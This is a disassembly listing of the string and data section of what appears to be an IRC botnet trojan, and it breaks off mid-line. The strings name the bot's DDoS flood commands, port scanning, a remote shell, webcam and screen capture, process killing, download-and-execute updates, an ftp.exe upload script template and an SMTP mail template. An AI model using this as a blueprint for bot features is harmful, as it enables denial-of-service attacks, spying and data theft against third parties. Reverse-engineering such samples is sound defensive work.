; DATA XREF: sub_401ACD:loc_4094B3o db 3, 34h, 2 db 73h ; s db 68h, 65h, 6Ch db 6Ch ; l db 2, 3, 2Dh aCouldnTOpenFil db ' Couldn',27h,'t open file: %s',0 unk_429E40 db 2Dh ; - ; DATA XREF: sub_401ACD+79DCo db 3, 34h, 2 db 73h ; s db 68h, 65h, 6Ch db 6Ch ; l db 2, 3, 2Dh aFileOpenedS db ' File opened: %s',0 align 10h unk_429E60 db 2Dh ; - ; DATA XREF: sub_401ACD+79B8o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aServerChangedT db 'Server changed to: ',27h,'%s',27h,'.',0 align 4 unk_429E88 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_409468o db 3, 34h, 2 db 64h ; d db 6Eh, 73h, 2 db 3 aCouldnTResol_0 db '- Couldn',27h,'t resolve hostname.',0 align 10h unk_429EB0 db 2Dh ; - ; DATA XREF: sub_401ACD+796Do db 3, 34h, 2 db 64h ; d db 6Eh, 73h, 2 db 3 aLookupSS_ db '- Lookup: %s -> %s.',0 align 10h unk_429ED0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4093FDo db 3, 34h, 2 db 70h ; p db 72h, 6Fh, 63h db 73h ; s db 2, 3, 2Dh aFailedToTermin db ' Failed to terminate process: %s',0 align 10h unk_429F00 db 2Dh ; - ; DATA XREF: sub_401ACD+7926o db 3, 34h, 2 db 70h ; p db 72h, 6Fh, 63h db 73h ; s db 2, 3, 2Dh aProcessKilledS db ' Process killed: %s',0 unk_429F20 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_409399o db 3, 34h, 2 db 70h ; p db 72h, 6Fh, 63h db 73h ; s db 2, 3, 2Dh aFailedToTerm_0 db ' Failed to terminate process ID: %s',0 unk_429F50 db 2Dh ; - ; DATA XREF: sub_401ACD+78C5o db 3, 34h, 2 db 70h ; p db 72h, 6Fh, 63h db 73h ; s db 2, 3, 2Dh aProcessKilledI db ' Process killed ID: %s',0 align 4 dword_429F74 dd 234032Dh, 656C6966h, 202D0302h, 656C6544h, 20646574h ; DATA XREF: sub_401ACD+7885o dd 27732527h, 2Eh unk_429F90 db 2Dh ; - ; DATA XREF: sub_401ACD+7803o db 3, 34h, 2 db 64h ; d db 2 dup(63h), 2 db 3 aSendFileSUserS db '- Send File: %s, User: %s.',0 dword_429FB4 dd 234032Dh, 656C6966h, 202D0302h, 7473694Ch, 7325203Ah ; DATA XREF: sub_401ACD+7786o dd 0 unk_429FCC db 2Dh ; - ; DATA XREF: sub_401ACD+7755o db 3, 34h, 2 db 76h ; v db 69h, 73h, 69h db 74h ; t db 2, 3, 2Dh aFailedToStartC db ' Failed to start connection thread, error: <%d>.',0 align 4 dword_42A00C dd 234032Dh, 69736976h, 2D030274h, 4C525520h, 7325203Ah ; DATA XREF: sub_401ACD+76E6o dd 2Eh dword_42A024 dd 234032Dh, 6372696Dh, 202D0302h, 6D6D6F43h, 20646E61h ; DATA XREF: sub_401ACD:loc_409140o dd 746E6573h, 2Eh unk_42A040 db 2Dh ; - ; DATA XREF: sub_401ACD+766Co db 3, 34h, 2 db 6Dh ; m db 69h, 72h, 63h db 2 db 3, 2Dh, 20h aClientNotOpen_ db 'Client not open.',0 align 10h dword_42A060 dd 234032Dh, 2646D63h, 43202D03h, 616D6D6Fh, 3A73646Eh ; DATA XREF: sub_401ACD+7630o dd 732520h unk_42A078 db 2Dh ; - ; DATA XREF: sub_401ACD+7611o db 3, 34h, 2 db 63h ; c db 6Dh, 64h, 2 db 3 aErrorSendingTo db '- Error sending to remote shell.',0 align 4 asc_42A0A4: ; DATA XREF: sub_401ACD+75F9o ; sub_40F6B4+FBo ... dw 0Ah unicode 0, <>,0 unk_42A0A8 db 2Dh ; - ; DATA XREF: sub_401ACD+75CFo db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aReadFileFailed db 'Read file failed: %s',0 align 4 unk_42A0CC db 2Dh ; - ; DATA XREF: sub_401ACD+75C2o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aReadFileComple db 'Read file complete: %s',0 align 10h unk_42A0F0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_40901Fo db 3, 34h, 2 db 63h ; c db 61h, 70h, 74h db 75h ; u db 72h, 65h, 2 db 3 aInvalidParam_0 db '- Invalid parameters for amateur video capture.',0 align 10h unk_42A130 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_409015o db 3, 34h, 2 db 63h ; c db 61h, 70h, 74h db 75h ; u db 72h, 65h, 2 db 3 aErrorWhileCapt db '- Error while capturing amateur video from webcam.',0 unk_42A170 db 2Dh ; - ; DATA XREF: sub_401ACD+753Eo db 3, 34h, 2 db 63h ; c db 61h, 70h, 74h db 75h ; u db 72h, 65h, 2 db 3 aAmateurVideoSa db '- Amateur video saved to: %s.',0 align 4 aVideo db 'video',0 ; DATA XREF: sub_401ACD:loc_408F87o align 4 unk_42A1A4 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408F74o db 3, 34h, 2 db 63h ; c db 61h, 70h, 74h db 75h ; u db 72h, 65h, 2 db 3 aInvalidParam_1 db '- Invalid parameters for webcam capture.',0 align 4 unk_42A1DC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408F6Do db 3, 34h, 2 db 63h ; c db 61h, 70h, 74h db 75h ; u db 72h, 65h, 2 db 3 aErrorWhileCa_0 db '- Error while capturing from webcam.',0 align 10h unk_42A210 db 2Dh ; - ; DATA XREF: sub_401ACD+7490o db 3, 34h, 2 db 63h ; c db 61h, 70h, 74h db 75h ; u db 72h, 65h, 2 db 3 aWebcamCaptureS db '- Webcam capture saved to: %s.',0 aFrame db 'frame',0 ; DATA XREF: sub_401ACD:loc_408EE6o align 4 unk_42A244 db 2Dh ; - ; DATA XREF: sub_401ACD+740Co db 3, 34h, 2 db 63h ; c db 61h, 70h, 74h db 75h ; u db 72h, 65h, 2 db 3 aDriverListComp db '- Driver list complete.',0 align 4 unk_42A26C db 2Dh ; - ; DATA XREF: sub_401ACD+73D9o db 3, 34h, 2 db 63h ; c db 61h, 70h, 74h db 75h ; u db 72h, 65h, 2 db 3 aDriverDSS_ db '- Driver #%d - %s - %s.',0 align 4 aDrivers db 'drivers',0 ; DATA XREF: sub_401ACD:loc_408E59o unk_42A29C db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408E46o db 3, 34h, 2 db 63h ; c db 61h, 70h, 74h db 75h ; u db 72h, 65h, 2 db 3 aNoFilenameSpec db '- No filename specified for screen capture.',0 align 4 unk_42A2D8 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408E3Fo db 3, 34h, 2 db 63h ; c db 61h, 70h, 74h db 75h ; u db 72h, 65h, 2 db 3 aErrorWhileCa_1 db '- Error while capturing screen.',0 align 4 unk_42A308 db 2Dh ; - ; DATA XREF: sub_401ACD+7362o db 3, 34h, 2 db 63h ; c db 61h, 70h, 74h db 75h ; u db 72h, 65h, 2 db 3 aScreenCaptureS db '- Screen capture saved to: %s.',0 aScreen db 'screen',0 ; DATA XREF: sub_401ACD:loc_408DFEo align 4 dword_42A33C dd 234032Dh, 6E69616Dh, 202D0302h, 68746547h, 3A74736Fh ; DATA XREF: sub_401ACD+7319o dd 2E732520h, 0 unk_42A358 db 2Dh ; - ; DATA XREF: sub_401ACD+72D3o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aUnableToExtrac db 'Unable to extract Gethost command.',0 align 4 unk_42A388 db 2Dh ; - ; DATA XREF: sub_401ACD+72B7o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aGethostSComman db 'Gethost: %s, Command: %s',0 align 10h unk_42A3B0 db 2Dh ; - ; DATA XREF: sub_401ACD+720Ao db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aAliasAddedS_ db 'Alias added: %s.',0 align 10h unk_42A3D0 db 2Dh ; - ; DATA XREF: sub_401ACD+71D6o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aPrivmsgSS_ db 'Privmsg: %s: %s.',0 align 10h unk_42A3F0 db 2Dh ; - ; DATA XREF: sub_401ACD+7181o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aActionSS_ db 'Action: %s: %s.',0 dword_42A40C dd 234032Dh, 6E69616Dh, 202D0302h, 6C637943h, 2E65h ; DATA XREF: sub_401ACD+710Fo dword_42A420 dd 54524150h, 0D732520h, 0Ah ; DATA XREF: sub_401ACD+70D5o ; sub_401ACD+7C48o unk_42A42C db 2Dh ; - ; DATA XREF: sub_401ACD+70B0o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aModeChangeS db 'Mode change: %s',0 aModeS db 'MODE %s',0Dh,0Ah,0 ; DATA XREF: sub_401ACD+709Fo align 4 dword_42A454 dd 234032Dh, 6E6F6C63h, 2D030265h, 77615220h, 73252820h ; DATA XREF: sub_401ACD+7074o dd 25203A29h, 73h dword_42A470 dd 234032Dh, 6E6F6C63h, 2D030265h, 646F4D20h, 25282065h ; DATA XREF: sub_401ACD+7005o dd 203A2973h, 7325h dword_42A48C dd 45444F4Dh, 732520h ; DATA XREF: sub_401ACD+6FAAo dword_42A494 dd 234032Dh, 6E6F6C63h, 2D030265h, 63694E20h, 2528206Bh ; DATA XREF: sub_401ACD+6F7Ao dd 203A2973h, 7325h dword_42A4B0 dd 4E494F4Ah, 20732520h, 7325h ; DATA XREF: sub_401ACD+6F01o dword_42A4BC dd 0A0D7325h, 0 ; DATA XREF: sub_401ACD+6ECFo ; sub_401ACD+6F58o ... dword_42A4C4 dd 54524150h, 732520h ; DATA XREF: sub_401ACD+6E96o dword_42A4CC dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_401ACD+6E85o aFailedToStartF db '- Failed to start flood thread, error: <%d>.',0 align 4 dword_42A508 dd 234032Dh, 67726174h, 3023361h ; DATA XREF: sub_401ACD+6E16o aFloodingSForSS db '- Flooding %s for %s seconds.',0 align 4 unk_42A534 db 2Dh ; - ; DATA XREF: sub_401ACD+6D86o db 3, 34h, 2 db 74h ; t db 73h, 75h, 6Eh db 61h ; a db 6Dh, 69h, 2 db 3 aFailedToStar_0 db '- Failed to start flood thread, error: <%d>.',0 align 10h unk_42A570 db 2Dh ; - ; DATA XREF: sub_401ACD+6D1Bo db 3, 34h, 2 db 74h ; t db 73h, 75h, 6Eh db 61h ; a db 6Dh, 69h, 2 db 3 aTsunamiHeading db '- Tsunami heading for %s (%s seconds).',0 unk_42A5A4 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408746o db 3, 34h, 2 db 6Dh ; m db 61h, 69h, 6Eh db 2 db 3, 2Dh, 20h aRepeatNotAllow db 'Repeat not allowed in command line: %s',0 align 4 dword_42A5D8 dd 234032Dh, 6E69616Dh, 202D0302h, 65706552h, 203A7461h ; DATA XREF: sub_401ACD+6C3Eo dd 7325h dword_42A5F0 dd 234032Dh, 6E69616Dh, 202D0302h, 616C6544h, 2E79h ; DATA XREF: sub_401ACD:loc_408674o dword_42A604 dd 25207325h, 73252073h, 73253A20h, 0 ; DATA XREF: sub_401ACD+6B63o ; sub_401ACD+6C15o ... dword_42A614 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401ACD:loc_4085D1o aBotIdMustBeDif db '- Bot ID must be different than current running process.',0 align 4 dword_42A65C dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401ACD+6AFAo aFailedToStartD db '- Failed to start download thread, error: <%d>.',0 dword_42A698 dd 234032Dh, 61647075h, 3026574h ; DATA XREF: sub_401ACD+6A8Bo aDownloadingUpd db '- Downloading update from: %s.',0 align 4 aSS_exe db '%s%s.exe',0 ; DATA XREF: sub_401ACD+69E3o align 10h dword_42A6D0 dd 234032Dh, 63657865h, 202D0302h, 6D6D6F43h, 73646E61h ; DATA XREF: sub_401ACD+6981o dd 7325203Ah, 0 unk_42A6EC db 2Dh ; - ; DATA XREF: sub_401ACD+6976o db 3, 34h, 2 db 65h ; e db 78h, 65h, 63h db 2 db 3, 2Dh, 20h aCouldnTExecute db 'Couldn',27h,'t execute file.',0 align 10h unk_42A710 db 2Dh ; - ; DATA XREF: sub_401ACD+68DCo db 3, 34h, 2 db 66h ; f db 69h, 6Eh, 64h db 66h ; f db 69h, 6Ch, 65h db 2 db 3, 2Dh, 20h aFailedToStar_1 db 'Failed to start search thread, error: <%d>.',0 unk_42A74C db 2Dh ; - ; DATA XREF: sub_401ACD+6866o db 3, 34h, 2 db 66h ; f db 69h, 6Eh, 64h db 66h ; f db 69h, 6Ch, 65h db 2 db 3, 2Dh, 20h aSearchingForFi db 'Searching for file: %s in: %s.',0 align 4 dword_42A77C dd 234032Dh, 656C6966h, 2D0302h ; DATA XREF: sub_401ACD:loc_40826Co ; sub_401ACD:loc_409367o unk_42A788 db 2Dh ; - ; DATA XREF: sub_401ACD+678Ao db 3, 34h, 2 db 66h ; f db 69h, 6Ch, 65h db 2 db 3, 2Dh, 20h aRenameSToS_ db 'Rename: ',27h,'%s',27h,' to: ',27h,'%s',27h,'.',0 align 4 unk_42A7AC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_408235o db 3, 34h, 2 db 69h ; i db 63h, 6Dh, 70h db 2 db 3, 2Dh, 20h aInvalidFloodTi db 'Invalid flood time must be greater than 0.',0 align 4 unk_42A7E4 db 2Dh ; - ; DATA XREF: sub_401ACD+675Eo db 3, 34h, 2 db 69h ; i db 63h, 6Dh, 70h db 2 db 3, 2Dh, 20h aFailedToStar_2 db 'Failed to start flood thread, error: <%d>.',0 align 4 unk_42A81C db 2Dh ; - ; DATA XREF: sub_401ACD+66EEo db 3, 34h, 2 db 69h ; i db 63h, 6Dh, 70h db 2 db 3, 2Dh, 20h aFloodingSFor_0 db 'Flooding: (%s) for %s seconds.',0 align 4 dword_42A848 dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_401ACD+666Bo aFailedToStar_3 db '- Failed to start clone thread, error: <%d>.',0 align 4 dword_42A884 dd 234032Dh, 6E6F6C63h, 3027365h ; DATA XREF: sub_401ACD+65FCo aCreatedOnSDInC db '- Created on %s:%d, in channel %s.',0 align 4 unk_42A8B4 db 2Dh ; - ; DATA XREF: sub_401ACD+6583o db 3, 34h, 2 db 64h ; d db 64h, 6Fh, 73h db 2 db 3, 2Dh, 20h aFailedToStar_4 db 'Failed to start flood thread, error: <%d>.',0 align 4 unk_42A8EC db 2Dh ; - ; DATA XREF: sub_401ACD+6514o db 3, 34h, 2 db 64h ; d db 64h, 6Fh, 73h db 2 db 3, 2Dh, 20h aFloodingSSForS db 'Flooding: (%s:%s) for %s seconds.',0 align 4 unk_42A91C db 2Dh ; - ; DATA XREF: sub_401ACD+648Ao db 3, 34h, 2 db 73h ; s db 79h, 6Eh, 2 db 3 aFailedToStar_5 db '- Failed to start flood thread, error: <%d>.',0 align 4 unk_42A954 db 2Dh ; - ; DATA XREF: sub_401ACD+641Bo db 3, 34h, 2 db 73h ; s db 79h, 6Eh, 2 db 3 aFloodingSSFo_0 db '- Flooding: (%s:%s) for %s seconds.',0 align 4 unk_42A984 db 2Dh ; - ; DATA XREF: sub_401ACD+63A2o db 3, 34h, 2 db 77h ; w db 6Fh, 6Eh, 6Bh db 2 db 3, 2Dh, 20h aFailedToStar_6 db 'Failed to start flood thread, error: <%d>.',0 align 4 unk_42A9BC db 2Dh ; - ; DATA XREF: sub_401ACD+6333o db 3, 34h, 2 db 77h ; w db 6Fh, 6Eh, 6Bh db 2 db 3, 2Dh, 20h aFloodingSFor_1 db 'Flooding %s for %s seconds using delay %s ms.',0 align 4 unk_42A9F8 db 2Dh ; - ; DATA XREF: sub_401ACD+62BAo db 3, 34h, 2 db 64h ; d db 6Fh, 77h, 6Eh db 6Ch ; l db 6Fh, 61h, 64h db 2 db 3, 2Dh, 20h aFailedToStartT db 'Failed to start transfer thread, error: <%d>.',0 align 4 unk_42AA38 db 2Dh ; - ; DATA XREF: sub_401ACD+624Bo db 3, 34h, 2 db 64h ; d db 6Fh, 77h, 6Eh db 6Ch ; l db 6Fh, 61h, 64h db 2 db 3, 2Dh, 20h aDownloadingUrl db 'Downloading URL: %s to: %s.',0 unk_42AA64 db 2Dh ; - ; DATA XREF: sub_401ACD+617Co db 3, 34h, 2 db 72h ; r db 65h, 64h, 69h db 72h ; r db 65h, 63h, 74h db 2 db 3, 2Dh, 20h aFailedToStartR db 'Failed to start redirection thread, error: <%d>.',0 align 4 unk_42AAA8 db 2Dh ; - ; DATA XREF: sub_401ACD+610Do db 3, 34h, 2 db 72h ; r db 65h, 64h, 69h db 72h ; r db 65h, 63h, 74h db 2 db 3, 2Dh, 20h aTcpRedirectCre db 'TCP redirect created from: %s:%d to: %s:%d.',0 unk_42AAE4 db 2Dh ; - ; DATA XREF: sub_401ACD+6010o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aPortScanStarte db 'Port scan started: %s:%d with delay: %d(ms).',0 align 10h aSSS_1 db '[%s] <%s> %s',0 ; DATA XREF: sub_401ACD+5F64o align 10h aSSS_2 db '[%s] * %s %s',0 ; DATA XREF: sub_401ACD+5E87o align 10h dword_42AB40 dd 54434101h, 204E4F49h, 17325h ; DATA XREF: sub_401ACD+5DF3o ; sub_401ACD+715Bo unk_42AB4C db 2Dh ; - ; DATA XREF: sub_401ACD+5D8Fo db 3, 34h, 2 db 70h ; p db 6Fh, 72h, 74h db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aFailedToStar_7 db 'Failed to start scan thread, error: <%d>.',0 align 4 unk_42AB88 db 2Dh ; - ; DATA XREF: sub_401ACD+5D20o db 3, 34h, 2 db 70h ; p db 6Fh, 72h, 74h db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aPortScanStar_0 db 'Port scan started: %s with delay: %d(ms) checking range %d-%d.',0 align 4 unk_42ABD8 db 2Dh ; - ; DATA XREF: sub_401ACD+5C89o ; sub_401ACD+607Fo db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aFailedToStar_8 db 'Failed to start scan thread, error: <%d>.',0 align 10h unk_42AC10 db 2Dh ; - ; DATA XREF: sub_401ACD+5C1Ao db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aSPortScanStart db '%s Port Scan started on %s:%d with a delay of %d seconds for %d m' db 'inutes using %d threads.',0 align 4 unk_42AC78 db 2Dh ; - ; DATA XREF: sub_401ACD+5AA4o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aFailedToStar_9 db 'Failed to start scan, no IP specified.',0 align 4 unk_42ACAC db 2Dh ; - ; DATA XREF: sub_401ACD+5A47o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aFailedToSta_10 db 'Failed to start scan, port is invalid.',0 align 10h unk_42ACE0 db 2Dh ; - ; DATA XREF: sub_401ACD:loc_4073F4o db 3, 34h, 2 db 66h ; f db 74h, 70h, 2 db 3 aUploadingFileS db '- Uploading file: %s to: %s failed.',0 align 10h unk_42AD10 db 2Dh ; - ; DATA XREF: sub_401ACD+5920o db 3, 34h, 2 db 66h ; f db 74h, 70h, 2 db 3 aUploadingFil_0 db '- Uploading file: %s to: %s',0 align 4 aFtp_exe db 'ftp.exe',0 ; DATA XREF: sub_401ACD+5907o aSS_3 db '-s:%s',0 ; DATA XREF: sub_401ACD+58F0o align 4 aOpenSSSSPutSBy db 'open %s',0Dh,0Ah ; DATA XREF: sub_401ACD+58CDo db '%s',0Dh,0Ah db '%s',0Dh,0Ah db '%s',0Dh,0Ah db 'put %s',0Dh,0Ah db 'bye',0Dh,0Ah,0 align 4 aAb db 'ab',0 ; DATA XREF: sub_401ACD+58A9o ; sub_411C14+4Eo align 10h aSIII_dll db '%s\%i%i%i.dll',0 ; DATA XREF: sub_401ACD+5898o align 10h unk_42AD80 db 2Dh ; - ; DATA XREF: sub_401ACD+584Eo db 3, 34h, 2 db 66h ; f db 74h, 70h, 2 db 3 aFileNotFoundS_ db '- File not found: %s.',0 align 10h aUpload db 'upload',0 ; DATA XREF: sub_401ACD+582Bo align 4 unk_42ADA8 db 2Dh ; - ; DATA XREF: sub_401ACD+57F5o db 3, 34h, 2 db 73h ; s db 63h, 61h, 6Eh db 2 db 3, 2Dh, 20h aAlreadyDScanni db 'Already %d scanning threads. Too many specified.',0 align 4 unk_42ADE8 db 2Dh ; - ; DATA XREF: sub_401ACD+5798o db 3, 34h, 2 db 75h ; u db 64h, 70h, 2 db 3 aFailedToSta_11 db '- Failed to start flood thread, error: <%d>.',0 align 10h unk_42AE20 db 2Dh ; - ; DATA XREF: sub_401ACD+572Do db 3, 34h, 2 db 75h ; u db 64h, 70h, 2 db 3 aSendingDPacket db '- Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).',0 align 4 unk_42AE68 db 2Dh ; - ; DATA XREF: sub_401ACD+567Co db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 73h db 65h ; e db 6Eh, 64h, 2 db 3 aMessageHasBeen db '- Message has been sent successfuly',0 align 4 unk_42AE9C db 2Dh ; - ; DATA XREF: sub_401ACD+5648o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 73h db 65h ; e db 6Eh, 64h, 2 db 3 aFailedToSendMe db '- Failed to send message, error <%i>.',0 align 10h unk_42AED0 db 2Dh ; - ; DATA XREF: sub_401ACD+5624o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 73h db 65h ; e db 6Eh, 64h, 2 db 3 aNetsendDoesNot db '- NetSend does not work on Win9x systems',0 align 4 unk_42AF08 db 2Dh ; - ; DATA XREF: sub_401ACD+5582o db 3, 34h, 2 db 6Eh ; n db 65h, 74h, 73h db 65h ; e db 6Eh, 64h, 2 db 3 aSendingMessage db '- Sending message %s times to %s using name %s',0 aIcmp_dllNotAva db 'ICMP.dll not available',0 ; DATA XREF: sub_401ACD+5565o align 4 unk_42AF5C db 2Dh ; - ; DATA XREF: sub_401ACD+5550o db 3, 34h, 2 db 70h ; p db 69h, 6Eh, 67h db 2 db 3, 2Dh, 20h aFailedToSta_12 db 'Failed to start flood thread, error: <%d>.',0 align 4 unk_42AF94 db 2Dh ; - ; DATA XREF: sub_401ACD+54E1o db 3, 34h, 2 db 70h ; p db 69h, 6Eh, 67h db 2 db 3, 2Dh, 20h aSendingDPingsT db 'Sending %d pings to %s. packet size: %d, timeout: %d(ms).',0 align 4 unk_42AFDC db 2Dh ; - ; DATA XREF: sub_401ACD:loc_406F00o db 3, 34h, 2 db 74h ; t db 63h, 70h, 2 db 3 aInvalidFlood_0 db '- Invalid flood time must be greater than 0.',0 align 4 unk_42B014 db 2Dh ; - ; DATA XREF: sub_401ACD+5429o db 3, 34h, 2 db 74h ; t db 63h, 70h, 2 db 3 aFailedToSta_13 db '- Failed to start flood thread, error: <%d>.',0 align 4 unk_42B04C db 2Dh ; - ; DATA XREF: sub_401ACD+53AFo db 3, 34h, 2 db 74h ; t db 63h, 70h, 2 db 3 aSSFloodingSSFo db '- %s %s flooding: (%s:%s) for %s seconds.',0 align 10h aNormal db 'Normal',0 ; DATA XREF: sub_401ACD+539Fo align 4 aSpoofed db 'Spoofed',0 ; DATA XREF: sub_401ACD+5398o unk_42B090 db 2Dh ; - ; DATA XREF: sub_401ACD+52FDo db 3, 34h, 2 db 74h ; t db 63h, 70h, 2 db 3 aInvalidFloodTy db '- Invalid flood type specified.',0 align 4 aRandom_0 db 'random',0 ; DATA XREF: sub_401ACD+52EDo ; sub_413E36+312o align 4 aAck db 'ack',0 ; DATA XREF: sub_401ACD+52D6o ; sub_413E36+2F2o aHcon db 'hcon',0 ; DATA XREF: sub_401ACD+5260o align 10h aHttpcon db 'httpcon',0 ; DATA XREF: sub_401ACD+524Do unk_42B0D8 db 2Dh ; - ; DATA XREF: sub_401ACD+51FEo db 3, 34h, 2 db 65h ; e db 6Dh, 61h, 69h db 6Ch ; l db 2, 3, 2Dh aMessageSentToS db ' Message sent to %s.',0 align 4 aHeloRndnickMai db 'helo $rndnick',0Ah ; DATA XREF: sub_401ACD+518Ao db 'mail from: <%s>',0Ah db 'rcpt to: <%s>',0Ah db 'data',0Ah db 'subject: %s',0Ah db 'from: %s',0Ah db '%s',0Ah db '.',0Ah,0 aEmail db 'email',0 ; DATA XREF: sub_401ACD+509Fo align 10h aTcp db 'tcp',0 ; DATA XREF: sub_401ACD+5088o aTcpflood db 'tcpflood',0 ; DATA XREF: sub_401ACD+5071o align 10h aP: ; DATA XREF: sub_401ACD+505Ao ; UPX0:00438308o ... unicode 0, <p>,0 aPing_0 db 'ping',0 ; DATA XREF: sub_401ACD+5043o align 4 aPingflood db 'pingflood',0 ; DATA XREF: sub_401ACD+502Co align 4 aNs db 'ns',0 ; DATA XREF: sub_401ACD+5015o align 4 aNetsend db 'netsend',0 ; DATA XREF: sub_401ACD+4FFEo aU: ; DATA XREF: sub_401ACD+4FE7o ; UPX0:00438300o ... unicode 0, <u>,0 aUdp db 'udp',0 ; DATA XREF: sub_401ACD+4FD0o aUdpflood db 'udpflood',0 ; DATA XREF: sub_401ACD+4FB9o align 4 aAdv db 'adv',0 ; DATA XREF: sub_401ACD+4FA2o aAdvscan db 'advscan',0 ; DATA XREF: sub_401ACD+4F8Bo aPsc db 'psc',0 ; DATA XREF: sub_401ACD+4F74o aPortscan db 'portscan',0 ; DATA XREF: sub_401ACD+4F5Do align 4 aC_a db 'c_a',0 ; DATA XREF: sub_401ACD+4F37o aC_action db 'c_action',0 ; DATA XREF: sub_401ACD+4F20o align 4 aC_pm db 'c_pm',0 ; DATA XREF: sub_401ACD+4F09o align 4 aC_privmsg db 'c_privmsg',0 ; DATA XREF: sub_401ACD+4EF2o align 4 aSc db 'sc',0 ; DATA XREF: sub_401ACD+4EDBo align 4 aScan db 'scan',0 ; DATA XREF: sub_401ACD+4EC4o align 4 aRd db 'rd',0 ; DATA XREF: sub_401ACD+4EADo align 4 aRedirect db 'redirect',0 ; DATA XREF: sub_401ACD+4E96o align 4 aJpl10 db 'jpl10',0 ; DATA XREF: sub_401ACD+4E7Fo align 4 aJpldg10 db 'jpldg10',0 ; DATA XREF: sub_401ACD+4E68o aWonk db 'wonk',0 ; DATA XREF: sub_401ACD+4E51o align 4 aPhatwonk db 'phatwonk',0 ; DATA XREF: sub_401ACD+4E3Ao align 4 dword_42B218 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_401ACD+4E2Do aFailedToSta_14 db '- Failed to start flood thread, error: <%d>.',0 align 4 dword_42B254 dd 234032Dh, 73796B73h, 3026E79h ; DATA XREF: sub_401ACD+4DBEo aFloodingSSFo_1 db '- Flooding: (%s:%s) for %s seconds.',0 aSkysyn db 'skysyn',0 ; DATA XREF: sub_401ACD+4D3Bo align 4 aSyn db 'syn',0 ; DATA XREF: sub_401ACD+4D24o ; sub_401ACD+52BEo ... aSynflood db 'synflood',0 ; DATA XREF: sub_401ACD+4D0Do align 4 unk_42B29C db 2Dh ; - ; DATA XREF: sub_401ACD+4D00o db 3, 34h, 2 db 77h ; w db 69h, 73h, 64h db 6Fh ; o db 6Dh, 28h, 75h db 64h ; d db 70h, 29h, 2 db 3 aFailedToSta_15 db '- Failed to start flood thread, error: <%d>.',0 align 4 aWisdom_udp db 'wisdom.udp',0 ; DATA XREF: sub_401ACD+4C29o align 4 aDdos_random db 'ddos.random',0 ; DATA XREF: sub_401ACD+4C12o ; sub_412B09:loc_412C35o aDdos_ack db 'ddos.ack',0 ; DATA XREF: sub_401ACD+4BFBo ; sub_412B09:loc_412C19o align 10h aDdos_syn db 'ddos.syn',0 ; DATA XREF: sub_401ACD+4BE4o ; sub_412B09+F1o align 4 aC: ; DATA XREF: sub_401ACD+4BCDo ; UPX0:00438338o ... unicode 0, <c>,0 aClone_0 db 'clone',0 ; DATA XREF: sub_401ACD+4BB6o align 4 aIcmp db 'icmp',0 ; DATA XREF: sub_401ACD+4B8Do align 10h aIcmpflood db 'icmpflood',0 ; DATA XREF: sub_401ACD+4B76o align 4 aMv db 'mv',0 ; DATA XREF: sub_401ACD+4B5Fo align 10h aRename db 'rename',0 ; DATA XREF: sub_401ACD+4B48o align 4 aFf db 'ff',0 ; DATA XREF: sub_401ACD+4B31o align 4 aFindfile db 'findfile',0 ; DATA XREF: sub_401ACD+4B1Ao align 4 aE: ; DATA XREF: sub_401ACD+4B03o ; UPX0:004382F0o ... unicode 0, <e>,0 aExecute db 'execute',0 ; DATA XREF: sub_401ACD+4AECo aJp10 db 'jp]10',0 ; DATA XREF: sub_401ACD+4AD5o align 4 aJpDe10 db 'jp]de10',0 ; DATA XREF: sub_401ACD+4ABEo aDe db 'de',0 ; DATA XREF: sub_401ACD+4AA7o align 4 aDelay db 'delay',0 ; DATA XREF: sub_401ACD+4A90o align 10h aRp db 'rp',0 ; DATA XREF: sub_401ACD+4A79o align 4 aRepeat db 'repeat',0 ; DATA XREF: sub_401ACD+4A62o ; sub_401ACD+6BE8o align 4 aTsn db 'tsn',0 ; DATA XREF: sub_401ACD+4A4Bo aTsunami db 'tsunami',0 ; DATA XREF: sub_401ACD+4A34o aT3 db 't3',0 ; DATA XREF: sub_401ACD+4A1Do align 4 aTarga3 db 'targa3',0 ; DATA XREF: sub_401ACD+4A06o align 4 aC_p db 